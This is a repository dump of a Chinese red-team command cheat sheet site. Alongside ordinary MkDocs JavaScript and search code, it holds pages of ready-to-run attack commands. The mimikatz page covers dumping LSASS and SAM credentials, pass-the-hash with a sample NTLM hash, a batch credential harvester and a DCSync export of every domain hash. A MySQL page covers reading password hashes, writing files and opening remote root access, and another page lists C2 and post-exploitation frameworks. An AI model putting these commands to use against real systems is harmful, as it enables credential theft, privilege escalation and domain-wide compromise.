461 | 462 | -------------------------------------------------------------------------------- /site/js/detail.js: -------------------------------------------------------------------------------- 1 | (function () { 2 | 'use strict'; 3 | /** 4 | * Converts details/summary tags into working elements in browsers that don't yet support them. 5 | * @return {void} 6 | */ 7 | var details = (function () { 8 | 9 | var isDetailsSupported = function () { 10 | // https://mathiasbynens.be/notes/html5-details-jquery#comment-35 11 | // Detect if details is supported in the browser 12 | var el = document.createElement("details"); 13 | var fake = false; 14 | 15 | if (!("open" in el)) { 16 | return false; 17 | } 18 | 19 | var root = document.body || function () { 20 | var de = document.documentElement; 21 | fake = true; 22 | return de.insertBefore(document.createElement("body"), de.firstElementChild || de.firstChild); 23 | }(); 24 | 25 | el.innerHTML = "ab"; 26 | el.style.display = "block"; 27 | root.appendChild(el); 28 | var diff = el.offsetHeight; 29 | el.open = true; 30 | diff = diff !== el.offsetHeight; 31 | root.removeChild(el); 32 | 33 | if (fake) { 34 | root.parentNode.removeChild(root); 35 | } 36 | 37 | return diff; 38 | }(); 39 | 40 | if (!isDetailsSupported) { 41 | var blocks = document.querySelectorAll("details>summary"); 42 | for (var i = 0; i < blocks.length; i++) { 43 | var summary = blocks[i]; 44 | var details = summary.parentNode; 45 | 46 | // Apply "no-details" to for unsupported details tags 47 | if (!details.className.match(new RegExp("(\\s|^)no-details(\\s|$)"))) { 48 | details.className += " no-details"; 49 | } 50 | 51 | summary.addEventListener("click", function (e) { 52 | var node = e.target.parentNode; 53 | if (node.hasAttribute("open")) { 54 | node.removeAttribute("open"); 55 | } else { 56 | node.setAttribute("open", "open"); 57 | } 58 | }); 59 | } 60 | } 61 | }); 62 | 63 | (function () { 64 | var onReady = function onReady(fn) { 65 | if (document.addEventListener) { 66 | document.addEventListener("DOMContentLoaded", fn); 67 | } else { 68 | document.attachEvent("onreadystatechange", function () { 69 | if (document.readyState === "interactive") { 70 | fn(); 71 | } 72 | }); 73 | } 74 | }; 75 | 76 | onReady(function () { 77 | details(); 78 | }); 79 | })(); 80 | 81 | }()); -------------------------------------------------------------------------------- /site/js/languages/asciidoc.min.js: -------------------------------------------------------------------------------- 1 | /*! `asciidoc` grammar compiled for Highlight.js 11.8.0 */ 2 | (()=>{var e=(()=>{"use strict";return e=>{const n=e.regex,a=[{ 3 | className:"strong",begin:/\*{2}([^\n]+?)\*{2}/},{className:"strong", 4 | begin:n.concat(/\*\*/,/((\*(?!\*)|\\[^\n]|[^*\n\\])+\n)+/,/(\*(?!\*)|\\[^\n]|[^*\n\\])*/,/\*\*/), 5 | relevance:0},{className:"strong",begin:/\B\*(\S|\S[^\n]*?\S)\*(?!\w)/},{ 6 | className:"strong",begin:/\*[^\s]([^\n]+\n)+([^\n]+)\*/}],s=[{ 7 | className:"emphasis",begin:/_{2}([^\n]+?)_{2}/},{className:"emphasis", 8 | begin:n.concat(/__/,/((_(?!_)|\\[^\n]|[^_\n\\])+\n)+/,/(_(?!_)|\\[^\n]|[^_\n\\])*/,/__/), 9 | relevance:0},{className:"emphasis",begin:/\b_(\S|\S[^\n]*?\S)_(?!\w)/},{ 10 | className:"emphasis",begin:/_[^\s]([^\n]+\n)+([^\n]+)_/},{className:"emphasis", 11 | begin:"\\B'(?!['\\s])",end:"(\\n{2}|')",contains:[{begin:"\\\\'\\w",relevance:0 12 | }],relevance:0}];return{name:"AsciiDoc",aliases:["adoc"], 13 | contains:[e.COMMENT("^/{4,}\\n","\\n/{4,}$",{relevance:10 14 | }),e.COMMENT("^//","$",{relevance:0}),{className:"title",begin:"^\\.\\w.*$"},{ 15 | begin:"^[=\\*]{4,}\\n",end:"\\n^[=\\*]{4,}$",relevance:10},{className:"section", 16 | relevance:10,variants:[{begin:"^(={1,6})[ \t].+?([ \t]\\1)?$"},{ 17 | begin:"^[^\\[\\]\\n]+?\\n[=\\-~\\^\\+]{2,}$"}]},{className:"meta", 18 | begin:"^:.+?:",end:"\\s",excludeEnd:!0,relevance:10},{className:"meta", 19 | begin:"^\\[.+?\\]$",relevance:0},{className:"quote",begin:"^_{4,}\\n", 20 | end:"\\n_{4,}$",relevance:10},{className:"code",begin:"^[\\-\\.]{4,}\\n", 21 | end:"\\n[\\-\\.]{4,}$",relevance:10},{begin:"^\\+{4,}\\n",end:"\\n\\+{4,}$", 22 | contains:[{begin:"<",end:">",subLanguage:"xml",relevance:0}],relevance:10},{ 23 | className:"bullet",begin:"^(\\*+|-+|\\.+|[^\\n]+?::)\\s+"},{className:"symbol", 24 | begin:"^(NOTE|TIP|IMPORTANT|WARNING|CAUTION):\\s+",relevance:10},{ 25 | begin:/\\[*_`]/},{begin:/\\\\\*{2}[^\n]*?\*{2}/},{begin:/\\\\_{2}[^\n]*_{2}/},{ 26 | begin:/\\\\`{2}[^\n]*`{2}/},{begin:/[:;}][*_`](?![*_`])/},...a,...s,{ 27 | className:"string",variants:[{begin:"``.+?''"},{begin:"`.+?'"}]},{ 28 | className:"code",begin:/`{2}/,end:/(\n{2}|`{2})/},{className:"code", 29 | begin:"(`.+?`|\\+.+?\\+)",relevance:0},{className:"code",begin:"^[ \\t]", 30 | end:"$",relevance:0},{begin:"^'{3,}[ \\t]*$",relevance:10},{ 31 | begin:"(link:)?(http|https|ftp|file|irc|image:?):\\S+?\\[[^[]*?\\]", 32 | returnBegin:!0,contains:[{begin:"(link|image:?):",relevance:0},{ 33 | className:"link",begin:"\\w",end:"[^\\[]+",relevance:0},{className:"string", 34 | begin:"\\[",end:"\\]",excludeBegin:!0,excludeEnd:!0,relevance:0}],relevance:10}] 35 | }}})();hljs.registerLanguage("asciidoc",e)})(); -------------------------------------------------------------------------------- /site/js/languages/groovy.min.js: -------------------------------------------------------------------------------- 1 | /*! `groovy` grammar compiled for Highlight.js 11.8.0 */ 2 | (()=>{var e=(()=>{"use strict";function e(e,a={}){return a.variants=e,a} 3 | return a=>{ 4 | const n=a.regex,t="[A-Za-z0-9_$]+",r=e([a.C_LINE_COMMENT_MODE,a.C_BLOCK_COMMENT_MODE,a.COMMENT("/\\*\\*","\\*/",{ 5 | relevance:0,contains:[{begin:/\w+@/,relevance:0},{className:"doctag", 6 | begin:"@[A-Za-z]+"}]})]),s={className:"regexp",begin:/~?\/[^\/\n]+\//, 7 | contains:[a.BACKSLASH_ESCAPE] 8 | },i=e([a.BINARY_NUMBER_MODE,a.C_NUMBER_MODE]),l=e([{begin:/"""/,end:/"""/},{ 9 | begin:/'''/,end:/'''/},{begin:"\\$/",end:"/\\$",relevance:10 10 | },a.APOS_STRING_MODE,a.QUOTE_STRING_MODE],{className:"string"}),c={ 11 | match:[/(class|interface|trait|enum|extends|implements)/,/\s+/,a.UNDERSCORE_IDENT_RE], 12 | scope:{1:"keyword",3:"title.class"}};return{name:"Groovy",keywords:{ 13 | "variable.language":"this super",literal:"true false null", 14 | type:["byte","short","char","int","long","boolean","float","double","void"], 15 | keyword:["def","as","in","assert","trait","abstract","static","volatile","transient","public","private","protected","synchronized","final","class","interface","enum","if","else","for","while","switch","case","break","default","continue","throw","throws","try","catch","finally","implements","extends","new","import","package","return","instanceof"] 16 | },contains:[a.SHEBANG({binary:"groovy",relevance:10}),r,l,s,i,c,{ 17 | className:"meta",begin:"@[A-Za-z]+",relevance:0},{className:"attr", 18 | begin:t+"[ \t]*:",relevance:0},{begin:/\?/,end:/:/,relevance:0, 19 | contains:[r,l,s,i,"self"]},{className:"symbol", 20 | begin:"^[ \t]*"+n.lookahead(t+":"),excludeBegin:!0,end:t+":",relevance:0}], 21 | illegal:/#|<\//}}})();hljs.registerLanguage("groovy",e)})(); -------------------------------------------------------------------------------- /site/js/languages/nix.min.js: -------------------------------------------------------------------------------- 1 | /*! `nix` grammar compiled for Highlight.js 11.8.0 */ 2 | (()=>{var e=(()=>{"use strict";return e=>{const n={ 3 | keyword:["rec","with","let","in","inherit","assert","if","else","then"], 4 | literal:["true","false","or","and","null"], 5 | built_in:["import","abort","baseNameOf","dirOf","isNull","builtins","map","removeAttrs","throw","toString","derivation"] 6 | },s={className:"subst",begin:/\$\{/,end:/\}/,keywords:n},a={className:"string", 7 | contains:[{className:"char.escape",begin:/''\$/},s],variants:[{begin:"''", 8 | end:"''"},{begin:'"',end:'"'}] 9 | },i=[e.NUMBER_MODE,e.HASH_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,a,{ 10 | begin:/[a-zA-Z0-9-_]+(\s*=)/,returnBegin:!0,relevance:0,contains:[{ 11 | className:"attr",begin:/\S+/,relevance:.2}]}];return s.contains=i,{name:"Nix", 12 | aliases:["nixos"],keywords:n,contains:i}}})();hljs.registerLanguage("nix",e) 13 | })(); -------------------------------------------------------------------------------- /site/js/theme.js: -------------------------------------------------------------------------------- 1 | function docReady(fn) { 2 | // see if DOM is already available 3 | if ( 4 | document.readyState === "complete" || 5 | document.readyState === "interactive" 6 | ) { 7 | // call on next available tick 8 | setTimeout(fn, 1); 9 | } else { 10 | document.addEventListener("DOMContentLoaded", fn); 11 | } 12 | } 13 | 14 | /** 15 | * Behavior for side bar navigation links when clicked 16 | */ 17 | const sideBarCollapsedNavigationLinks = () => { 18 | const elementsCollapsed = document.getElementsByClassName( 19 | "side-bar__link--collapsed" 20 | ); 21 | const elementsExpanded = document.getElementsByClassName( 22 | "side-bar__link--expanded" 23 | ); 24 | 25 | const onElementClick = (element) => { 26 | element.onclick = () => { 27 | if (element.classList.contains("side-bar__link--expanded")) { 28 | element.classList.remove("side-bar__link--expanded"); 29 | element.classList.add("side-bar__link--collapsed"); 30 | const submenu = element.parentElement.getElementsByClassName("side-bar__sub-menu"); 31 | submenu[0].classList.remove("side-bar__sub-menu--visible"); 32 | } else { 33 | element.classList.remove("side-bar__link--collapsed"); 34 | element.classList.add("side-bar__link--expanded"); 35 | const submenu = element.parentElement.getElementsByClassName("side-bar__sub-menu"); 36 | submenu[0].classList.add("side-bar__sub-menu--visible"); 37 | } 38 | }; 39 | }; 40 | 41 | Array.prototype.map.call(elementsCollapsed, onElementClick); 42 | Array.prototype.map.call(elementsExpanded, onElementClick); 43 | }; 44 | 45 | const openSideBarMenu = () => { 46 | const menu = document.getElementsByClassName("top-bar__item--trigger")[0]; 47 | menu.onclick = () => { 48 | const appLayout = document.getElementsByClassName("app-layout")[0]; 49 | appLayout.classList.add("app-layout--active-side-bar"); 50 | }; 51 | }; 52 | 53 | const closeSideBarMenu = () => { 54 | const menu = document.getElementsByClassName("side-bar__close")[0]; 55 | menu.onclick = () => { 56 | const appLayout = document.getElementsByClassName("app-layout")[0]; 57 | appLayout.classList.remove("app-layout--active-side-bar"); 58 | }; 59 | }; 60 | 61 | const updateSecondarySideBarHeight = () => { 62 | // Get width and height of the window excluding scrollbars 63 | // const w = document.documentElement.clientWidth; 64 | const h = document.documentElement.clientHeight; 65 | 66 | const secondarySideBar = 67 | document.getElementsByClassName("sidebar--secondary")[0]; 68 | const secondarySideBarExists = !!secondarySideBar; 69 | if (secondarySideBarExists) { 70 | secondarySideBar.style["height"] = `${h - 160}px`; 71 | } 72 | }; 73 | 74 | const addNavigationControl = (navigationClass, keyCode) => { 75 | document.addEventListener("keyup", (event) => { 76 | if (event.isComposing || event.keyCode !== keyCode) { 77 | return; 78 | } 79 | const elements = document.getElementsByClassName(navigationClass); 80 | Array.prototype.map.call(elements, (element) => { 81 | element.click(); 82 | }); 83 | }); 84 | }; 85 | 86 | const KEY_LEFT = 37; 87 | const KEY_RIGHT = 39; 88 | 89 | function loadColorScheme() { 90 | const isSystemDark = 91 | window.matchMedia("(prefers-color-scheme: dark)").media !== "not all"; 92 | const loadSettings = localStorage.getItem("dark-mode"); 93 | const checked = 94 | loadSettings !== null ? JSON.parse(loadSettings) : isSystemDark; 95 | document.getElementById("dark-mode").checked = checked; 96 | } 97 | 98 | function saveColorScheme(value) { 99 | const checkbox = document.getElementById("dark-mode"); 100 | localStorage.setItem("dark-mode", value); 101 | } 102 | 103 | function startColorScheme() { 104 | const checkbox = document.getElementById("dark-mode"); 105 | checkbox.onclick = () => { 106 | saveColorScheme(checkbox.checked); 107 | }; 108 | } 109 | // load prefered mode 110 | loadColorScheme(); 111 | 112 | docReady(() => { 113 | startColorScheme(); 114 | 115 | // Attaching the event listener function to window's resize event 116 | window.addEventListener("resize", updateSecondarySideBarHeight); 117 | // Initializing functions 118 | updateSecondarySideBarHeight(); 119 | sideBarCollapsedNavigationLinks(); 120 | openSideBarMenu(); 121 | closeSideBarMenu(); 122 | addNavigationControl("navigation-prev", KEY_LEFT); 123 | addNavigationControl("navigation-next", KEY_RIGHT); 124 | }); 125 | -------------------------------------------------------------------------------- /site/search.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 11 | 红队命令速查 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 57 | 58 |
59 | 60 |
61 | 62 | 114 | 115 | 124 | 287 | 288 | 289 |
290 |
291 |
292 |
293 | 294 |
295 |
296 |
297 |
298 | 299 | 300 | 301 |

Search Results

302 | 303 | 307 | 308 |
309 | Sorry, page not found. 310 |
311 | 312 | 313 |
314 |
315 |
316 |
317 |
318 | 319 | 320 |
321 | 324 |
325 |
326 | 327 | 328 | 332 | 333 | 338 | 339 | 340 | 341 | 342 | 343 | 346 | 347 | 354 | 355 | 356 | 357 | 358 | 359 | 385 | 394 | 395 |
396 | 397 | -------------------------------------------------------------------------------- /site/search/main.js: -------------------------------------------------------------------------------- 1 | function getSearchTermFromLocation() { 2 | var sPageURL = window.location.search.substring(1); 3 | var sURLVariables = sPageURL.split('&'); 4 | for (var i = 0; i < sURLVariables.length; i++) { 5 | var sParameterName = sURLVariables[i].split('='); 6 | if (sParameterName[0] == 'q') { 7 | return decodeURIComponent(sParameterName[1].replace(/\+/g, '%20')); 8 | } 9 | } 10 | } 11 | 12 | function joinUrl (base, path) { 13 | if (path.substring(0, 1) === "/") { 14 | // path starts with `/`. Thus it is absolute. 15 | return path; 16 | } 17 | if (base.substring(base.length-1) === "/") { 18 | // base ends with `/` 19 | return base + path; 20 | } 21 | return base + "/" + path; 22 | } 23 | 24 | function escapeHtml (value) { 25 | return value.replace(/&/g, '&') 26 | .replace(/"/g, '"') 27 | .replace(//g, '>'); 29 | } 30 | 31 | function formatResult (location, title, summary) { 32 | return '

'+ escapeHtml(title) + '

' + escapeHtml(summary) +'

'; 33 | } 34 | 35 | function displayResults (results) { 36 | var search_results = document.getElementById("mkdocs-search-results"); 37 | while (search_results.firstChild) { 38 | search_results.removeChild(search_results.firstChild); 39 | } 40 | if (results.length > 0){ 41 | for (var i=0; i < results.length; i++){ 42 | var result = results[i]; 43 | var html = formatResult(result.location, result.title, result.summary); 44 | search_results.insertAdjacentHTML('beforeend', html); 45 | } 46 | } else { 47 | var noResultsText = search_results.getAttribute('data-no-results-text'); 48 | if (!noResultsText) { 49 | noResultsText = "No results found"; 50 | } 51 | search_results.insertAdjacentHTML('beforeend', '

' + noResultsText + '

'); 52 | } 53 | } 54 | 55 | function doSearch () { 56 | var query = document.getElementById('mkdocs-search-query').value; 57 | if (query.length > min_search_length) { 58 | if (!window.Worker) { 59 | displayResults(search(query)); 60 | } else { 61 | searchWorker.postMessage({query: query}); 62 | } 63 | } else { 64 | // Clear results for short queries 65 | displayResults([]); 66 | } 67 | } 68 | 69 | function initSearch () { 70 | var search_input = document.getElementById('mkdocs-search-query'); 71 | if (search_input) { 72 | search_input.addEventListener("keyup", doSearch); 73 | } 74 | var term = getSearchTermFromLocation(); 75 | if (term) { 76 | search_input.value = term; 77 | doSearch(); 78 | } 79 | } 80 | 81 | function onWorkerMessage (e) { 82 | if (e.data.allowSearch) { 83 | initSearch(); 84 | } else if (e.data.results) { 85 | var results = e.data.results; 86 | displayResults(results); 87 | } else if (e.data.config) { 88 | min_search_length = e.data.config.min_search_length-1; 89 | } 90 | } 91 | 92 | if (!window.Worker) { 93 | console.log('Web Worker API not supported'); 94 | // load index in main thread 95 | $.getScript(joinUrl(base_url, "search/worker.js")).done(function () { 96 | console.log('Loaded worker'); 97 | init(); 98 | window.postMessage = function (msg) { 99 | onWorkerMessage({data: msg}); 100 | }; 101 | }).fail(function (jqxhr, settings, exception) { 102 | console.error('Could not load worker.js'); 103 | }); 104 | } else { 105 | // Wrap search in a web worker 106 | var searchWorker = new Worker(joinUrl(base_url, "search/worker.js")); 107 | searchWorker.postMessage({init: true}); 108 | searchWorker.onmessage = onWorkerMessage; 109 | } 110 | -------------------------------------------------------------------------------- /site/search/worker.js: -------------------------------------------------------------------------------- 1 | var base_path = 'function' === typeof importScripts ? '.' : '/search/'; 2 | var allowSearch = false; 3 | var index; 4 | var documents = {}; 5 | var lang = ['en']; 6 | var data; 7 | 8 | function getScript(script, callback) { 9 | console.log('Loading script: ' + script); 10 | $.getScript(base_path + script).done(function () { 11 | callback(); 12 | }).fail(function (jqxhr, settings, exception) { 13 | console.log('Error: ' + exception); 14 | }); 15 | } 16 | 17 | function getScriptsInOrder(scripts, callback) { 18 | if (scripts.length === 0) { 19 | callback(); 20 | return; 21 | } 22 | getScript(scripts[0], function() { 23 | getScriptsInOrder(scripts.slice(1), callback); 24 | }); 25 | } 26 | 27 | function loadScripts(urls, callback) { 28 | if( 'function' === typeof importScripts ) { 29 | importScripts.apply(null, urls); 30 | callback(); 31 | } else { 32 | getScriptsInOrder(urls, callback); 33 | } 34 | } 35 | 36 | function onJSONLoaded () { 37 | data = JSON.parse(this.responseText); 38 | var scriptsToLoad = ['lunr.js']; 39 | if (data.config && data.config.lang && data.config.lang.length) { 40 | lang = data.config.lang; 41 | } 42 | if (lang.length > 1 || lang[0] !== "en") { 43 | scriptsToLoad.push('lunr.stemmer.support.js'); 44 | if (lang.length > 1) { 45 | scriptsToLoad.push('lunr.multi.js'); 46 | } 47 | if (lang.includes("ja") || lang.includes("jp")) { 48 | scriptsToLoad.push('tinyseg.js'); 49 | } 50 | for (var i=0; i < lang.length; i++) { 51 | if (lang[i] != 'en') { 52 | scriptsToLoad.push(['lunr', lang[i], 'js'].join('.')); 53 | } 54 | } 55 | } 56 | loadScripts(scriptsToLoad, onScriptsLoaded); 57 | } 58 | 59 | function onScriptsLoaded () { 60 | console.log('All search scripts loaded, building Lunr index...'); 61 | if (data.config && data.config.separator && data.config.separator.length) { 62 | lunr.tokenizer.separator = new RegExp(data.config.separator); 63 | } 64 | 65 | if (data.index) { 66 | index = lunr.Index.load(data.index); 67 | data.docs.forEach(function (doc) { 68 | documents[doc.location] = doc; 69 | }); 70 | console.log('Lunr pre-built index loaded, search ready'); 71 | } else { 72 | index = lunr(function () { 73 | if (lang.length === 1 && lang[0] !== "en" && lunr[lang[0]]) { 74 | this.use(lunr[lang[0]]); 75 | } else if (lang.length > 1) { 76 | this.use(lunr.multiLanguage.apply(null, lang)); // spread operator not supported in all browsers: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Spread_operator#Browser_compatibility 77 | } 78 | this.field('title'); 79 | this.field('text'); 80 | this.ref('location'); 81 | 82 | for (var i=0; i < data.docs.length; i++) { 83 | var doc = data.docs[i]; 84 | this.add(doc); 85 | documents[doc.location] = doc; 86 | } 87 | }); 88 | console.log('Lunr index built, search ready'); 89 | } 90 | allowSearch = true; 91 | postMessage({config: data.config}); 92 | postMessage({allowSearch: allowSearch}); 93 | } 94 | 95 | function init () { 96 | var oReq = new XMLHttpRequest(); 97 | oReq.addEventListener("load", onJSONLoaded); 98 | var index_path = base_path + '/search_index.json'; 99 | if( 'function' === typeof importScripts ){ 100 | index_path = 'search_index.json'; 101 | } 102 | oReq.open("GET", index_path); 103 | oReq.send(); 104 | } 105 | 106 | function search (query) { 107 | if (!allowSearch) { 108 | console.error('Assets for search still loading'); 109 | return; 110 | } 111 | 112 | var resultDocuments = []; 113 | var results = index.search(query); 114 | for (var i=0; i < results.length; i++){ 115 | var result = results[i]; 116 | doc = documents[result.ref]; 117 | doc.summary = doc.text.substring(0, 200); 118 | resultDocuments.push(doc); 119 | } 120 | return resultDocuments; 121 | } 122 | 123 | if( 'function' === typeof importScripts ) { 124 | onmessage = function (e) { 125 | if (e.data.init) { 126 | init(); 127 | } else if (e.data.query) { 128 | postMessage({ results: search(e.data.query) }); 129 | } else { 130 | console.error("Worker - Unrecognized message: " + e); 131 | } 132 | }; 133 | } 134 | -------------------------------------------------------------------------------- /site/sitemap.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /site/工具使用命令速查/mimikatz/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 11 | mimikatz - 红队命令速查 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 37 | 38 | 39 | 40 | 41 | 42 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 56 | 57 |
58 | 59 |
60 | 61 | 113 | 114 | 123 | 286 | 287 | 288 |
289 |
290 |
mimikatz
291 |
292 | 293 | 324 | 325 |
326 |
327 |
328 |
329 | 330 | 331 |

mimikatz

332 |

官方 Github:https://github.com/gentilkiwi/mimikatz

333 |

获取登录凭证信息

334 |
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
335 | 
336 |
privilege::debug
337 | sekurlsa::logonpasswords
338 | 
339 |

lsass.exe 导出凭据

340 |
mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
341 | 
342 |

mimikatz PTH 传递 cmd

343 |
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:cmd.exe" "exit"
344 | 
345 |

mimikatz PTH 传递 mstsc

346 |
mimikatz "privilege::debug"  "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:mstsc.exe /restrictedadmin" "exit"
347 | 
348 |
privilege::debug
349 | sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 "/run:mstsc.exe /restrictedadmin"
350 | 
351 |

SAM 数据库导出凭据

352 |
mimikatz "log" "lsadump::sam /sam:sam.hive /system:system.hive"  "exit"
353 | 
354 |

bat 脚本获取凭据

355 |
@echo off
356 | cd /d D:\tools\
357 | mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > C:\windows\temp\log.txt
358 | 
359 |

导出域内所有用户hash

360 |
mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit
361 | 
362 | 363 |
364 |
365 |
366 |
367 |
368 | 369 | 370 | 399 |
400 | 401 | 402 | 406 | 407 | 412 | 413 | 414 | 415 | 416 | 417 | 420 | 421 | 428 | 429 | 430 | 431 | 432 | 433 | 459 | 468 | 469 |
470 | 471 | -------------------------------------------------------------------------------- /site/工具使用命令速查/后渗透工具列表/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 11 | 后渗透工具列表 - 红队命令速查 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 37 | 38 | 39 | 40 | 41 | 42 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 56 | 57 |
58 | 59 |
60 | 61 | 113 | 114 | 123 | 286 | 287 | 288 |
289 |
290 |
后渗透工具列表
291 |
292 | 293 | 318 | 319 |
320 |
321 |
322 |
323 | 324 | 325 |

后渗透工具列表

326 |

f8x

327 |
328 |

一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等

329 |
330 | 334 |

Supershell

335 |
336 |

Supershell C2 远控平台,基于反向SSH隧道获取完全交互式Shell

337 |
338 | 341 |

Viper

342 |
343 |

互联网攻击面管理&红队模拟平台

344 |
345 | 349 |

Sliver C2

350 |
351 |

Sliver C2 是一个开源的跨平台红队框架。

352 |
353 | 357 |

Impacket

358 |
359 |

内网渗透 Python 工具包

360 |
361 | 364 | 365 |
366 |
367 |
368 |
369 |
370 | 371 | 372 | 401 |
402 | 403 | 404 | 408 | 409 | 414 | 415 | 416 | 417 | 418 | 419 | 422 | 423 | 430 | 431 | 432 | 433 | 434 | 435 | 461 | 470 | 471 |
472 | 473 | -------------------------------------------------------------------------------- /site/数据库命令速查/mysql/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 11 | mysql - 红队命令速查 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 37 | 38 | 39 | 40 | 41 | 42 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 56 | 57 |
58 | 59 |
60 | 61 | 113 | 114 | 123 | 286 | 287 | 288 |
289 |
290 |
mysql
291 |
292 | 293 | 324 | 325 |
326 |
327 |
328 |
329 | 330 | 331 |

mysql

332 |

mysql 查连接 IP

333 |
SELECT * FROM performance_schema.hosts;
334 | show full processlist;
335 | 
336 |

mysql 查最大数量表

337 |
select table_name,table_rows,table_schema,table_comment from  information_schema.tables order by table_rows desc;
338 | 
339 |

查询 user 字段在哪个库哪个表

340 |
SELECT 
341 |     TABLE_SCHEMA AS database_name,
342 |     TABLE_NAME AS table_name,
343 |     COLUMN_NAME AS column_name
344 | FROM 
345 |     INFORMATION_SCHEMA.COLUMNS
346 | WHERE 
347 |     COLUMN_NAME LIKE '%user%';
348 | 
349 |

统计访问过的表次数

350 |
//库名,表名,访问次数
351 | select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc; 
352 | 
353 |

查看写入权限

354 |
mysql> show global variables like '%secure%';
355 | +------------------+-------+
356 | | Variable_name    | Value |
357 | +------------------+-------+
358 | | secure_auth      | ON    |
359 | | secure_file_priv |          |    可写入
360 | | secure_file_priv | NULL |   不可写入
361 | +------------------+-------+
362 | 
363 |
SHOW VARIABLES LIKE "secure_file_priv";
364 | 
365 |
    366 |
  • NULL,表示禁止。
  • 367 |
  • 如果value值有文件夹目录,则表示只允许该目录下文件,测试子目录也不行。
  • 368 |
  • 如果为空,则表示不限制目录。
  • 369 |
370 |

不登录执行 sql

371 |
mysql -uaHmin -proot test -e "select now()" -N >H:/work/target1.txt
372 | mysql -uroot -e "show databases;" >1.txt
373 | 
374 |

基础命令

375 |
显示版本: select version();
376 | 显示字符集: select @@character_set_database;
377 | 显示数据库: show databases;
378 | 显示表名: show tables;
379 | 显示字段: show columns from table_name;
380 | 显示计算机名: select @@hostname;
381 | 系统版本: select @@version_compile_os;
382 | mysql路径: select @@basedir;
383 | 数据库路径: select @@datadir;
384 | describe describe table_name;
385 | 显示root密码: select User,Password from mysql.user;
386 | 导入文件: select load_fie(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);
387 | 导出文件: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;
388 | 开启外连: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
389 | mysql安装路径: show variables;   
390 | 更新数据库: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407;更新40407uid变成uid1
391 | mysql更改root密码: mysqladmin -u root password "newpwd";
392 | 查询表: select concat(User,0x3a,Password) from mysql.user; 
393 | 获取数据库所有表: SHOW TABLES FROM `databases`;
394 | 获取列前20行: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;
395 | 获取表行数: SELECT COUNT(*) AS CNT FROM `dede_admin`;
396 | 
397 | 398 |
399 |
400 |
401 |
402 |
403 | 404 | 405 | 434 |
435 | 436 | 437 | 441 | 442 | 447 | 448 | 449 | 450 | 451 | 452 | 455 | 456 | 463 | 464 | 465 | 466 | 467 | 468 | 494 | 503 | 504 |
505 | 506 | -------------------------------------------------------------------------------- /工具使用命令速查/mimikatz.md: -------------------------------------------------------------------------------- 1 | # mimikatz 2 | 3 | 官方 Github:https://github.com/gentilkiwi/mimikatz 4 | 5 | ## 获取登录凭证信息 6 | 7 | ``` 8 | mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit 9 | ``` 10 | 11 | ``` 12 | privilege::debug 13 | sekurlsa::logonpasswords 14 | ``` 15 | 16 | ## lsass.exe 导出凭据 17 | 18 | ``` 19 | mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit 20 | ``` 21 | 22 | ## mimikatz PTH 传递 cmd 23 | 24 | ``` 25 | mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:cmd.exe" "exit" 26 | ``` 27 | 28 | ## mimikatz PTH 传递 mstsc 29 | 30 | ``` 31 | mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:mstsc.exe /restrictedadmin" "exit" 32 | ``` 33 | 34 | ``` 35 | privilege::debug 36 | sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 "/run:mstsc.exe /restrictedadmin" 37 | ``` 38 | 39 | ## SAM 数据库导出凭据 40 | 41 | ``` 42 | mimikatz "log" "lsadump::sam /sam:sam.hive /system:system.hive" "exit" 43 | ``` 44 | 45 | 46 | ## bat 脚本获取凭据 47 | 48 | ``` 49 | @echo off 50 | cd /d D:\tools\ 51 | mimikatz.exe privilege::debug sekurlsa::logonpasswords exit 